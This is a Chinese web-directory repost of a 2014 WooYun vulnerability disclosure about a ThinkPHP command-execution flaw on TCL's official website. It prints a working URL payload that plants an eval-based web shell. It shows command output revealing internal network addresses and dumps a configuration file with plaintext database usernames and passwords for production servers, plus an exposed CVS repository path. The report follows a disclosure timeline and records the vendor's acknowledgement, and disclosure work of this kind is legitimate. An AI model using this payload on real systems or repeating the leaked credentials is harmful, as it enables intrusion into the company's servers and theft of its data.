网站目录收录网站方式:1.人工手动审核。2.自助审核(你的网站在权重3、PR4以上,挂上本站友链->点击友链->自动审核通过。)
北京 天津 上海 广东 深圳 河北 河南 新疆 重庆 四川 贵州 湖南 湖北 云南 广西 宁夏 青海 甘肃 陕西
西藏 海南 山东 福建 安徽 浙江 吉林 山西 江西 江苏 辽宁 黑龙 内蒙 澳门 香港 台湾 日本 韩国 美国
当前位置:站长啦网站目录 » 新闻资讯 » 站长新闻 » 漏洞预警 » 文章详细 订阅RssFeed

[公开漏洞]TCL官网命令执行导致getshell(可内网,附赠信息泄漏一枚)

来源:WooYun 浏览:986次 时间:2014-06-16
简介:TCL官网命令执行导致getshell(可内网,附赠信息泄漏一枚) 相关厂商: TCL官方网上商城漏洞作者:Mody 提交时间:2014-04-30 19:45 公开时间:2014-06-14 19:45 漏洞类型:命令执行危害等级:高

TCL官网命令执行导致getshell(可内网,附赠信息泄漏一枚) 相关厂商: TCL官方网上商城 漏洞作者:Mody 提交时间:2014-04-30 19:45 公开时间:2014-06-14 19:45 漏洞类型:命令执行 危害等级:高 自评Rank:20 漏洞状态: 厂商已经确认 漏洞来源:http://www.wooyun.org Tags标签: 信息泄漏 命令执行 漏洞详情 披露状态:

2014-04-30:细节已通知厂商并且等待厂商处理中
2014-04-30:厂商已经确认,细节仅向厂商公开
2014-05-10:细节向核心白帽子及相关领域专家公开
2014-05-20:细节向普通白帽子公开
2014-05-30:细节向实习白帽子公开
2014-06-14:细节向公众公开

简要描述:

如题

详细说明:

1. 主站命令执行

是thinkphp的命令执行漏洞,这么久了还没修复,维护人员该打pp了

http://www.tcl.com/new/1735.html/abc/abc/abc/${@phpinfo()}

直接http://www.tcl.com/new/1735.html/abc/abc/abc/$%7B@print(eval($_POST[c]))%7D getshell

来张图

1.JPG



内网信息

[/var/www/html/tcl/]$ whoami
apache


[/var/www/html/tcl/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

eth1 Link encap:Ethernet HWaddr 00:1B:21:BA:99:B2
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)

eth2 Link encap:Ethernet HWaddr 40:F2:E9:29:38:D2
inet addr:10.4.22.72 Bcast:10.4.255.255 Mask:255.255.0.0
inet6 addr: fe80::42f2:e9ff:fe29:38d2/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:291345943 errors:0 dropped:0 overruns:0 frame:0
TX packets:420280104 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:56145622678 (52.2 GiB) TX bytes:489393736613 (455.7 GiB)
Memory:91580000-915a0000

漏洞证明:

内网敏感信息泄漏

翻下目录,发现了内网好多信息

1. n多数据库账户密码泄漏

<?php

switch($_SERVER["HTTP_HOST"]) {



case "localhost:8080": { //本机
$db_host = "localhost";
$db_name = "tcl";
$db_user = 'root';
$db_pass = 'root';

$db_name_en = "tcl_en";

$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}


case "10.4.21.23": { //测试
$db_host = "10.4.21.20";
$db_name = "tcl";
$db_user = 'tcladmin';
$db_pass = '123456';

$db_host_en = "10.4.21.20";
$db_name_en = "tcl_en";

$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.21.24": { //测试2
$db_host = "10.4.21.20";
$db_name = "tcl";
$db_user = 'tcladmin';
$db_pass = '123456';

$db_host_en = "10.4.21.20";
$db_name_en = "tcl_en";

$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.22.72": { //正式
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';

$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";

$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
case "10.4.22.73": { //正式2
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';

$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";

$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = false;
break;
}
default : { //正式
$db_host = "10.4.22.71";
$db_name = "tcl";
$db_user = 'tcl_admin';
$db_pass = 'zpw@8b!gurvu';

$db_host_en = "10.4.22.71";
$db_name_en = "tcl_en";

$cache_type = "File";
$url_model = 2;
$html_cache = false;
$temp_my_cache = true;
break;
}

}
?>





2. 附赠子域名站点cvs信息泄漏一枚

http://multimedia.tcl.com/cn/investor/CVS/Root

http://multimedia.tcl.com/CVS/Root

http://multimedia.tcl.com/en/home/CVS/Root

:sspi:mars.ho@source.loko-asia.com:2401/cvsdata



修复方案:

1. 升级

2. 改口令,之前不知道还有人来过没,一定要改

3. 给个高rank呗

版权声明:转载请注明来源 Mody@乌云 漏洞回应 厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-30 22:03

厂商回复:

感谢您的关注,已转交相关单位处理。

最新状态:

暂无


0

版权与免责声明:

凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;


本文地址:https://top.cnzzla.com/artinfo/1793.html

好玩的手游下载

猜你喜欢

推荐站点

  • 福州小程序开发福州小程序开发

    福州好小蚁科技提供专业的微信小程序开发、软件定制、手机APP开发、网站开发等高端定制外包服务,价格美丽,服务周到.一对一项目对接,不满意退全款!预约电话:13107632710 胡小春!福州好小蚁科技有限公司是福建福州网站app等技术开发优秀网络公司。

    www.fzant.com
  • 世界时间网世界时间网

    世界时间网为您提供世界各地精准时间,北京时间校准器,标准时间,世界各地时间与北京时间对比,时间换算等,希望对您有所帮助。

    top.cnzzla.com/time
  • 科技镇科技镇

    科技镇 | 关注科技、娱乐、人文、生活!

    www.kejizhen.com
  • 心动网址导航心动网址导航

    心动网址导航精选了国内国外著名的网站、好玩的、好看的、有趣的国内国外网站以及实用的、优秀的国内国外网站,包括国外视频、国外购物、国外交友、国外新闻等多种类型 同时提供精品行业分类目录提交,让用户全方位了解国内国外互联网动态!

    xd00.com
  • 门户网址-优秀网站导航门户网址-优秀网站导航

    门户网址-优秀网站导航,精选网址导航,免费分类目录提交,实用酷站大全。

    top.mhwz.cn

最新优秀网站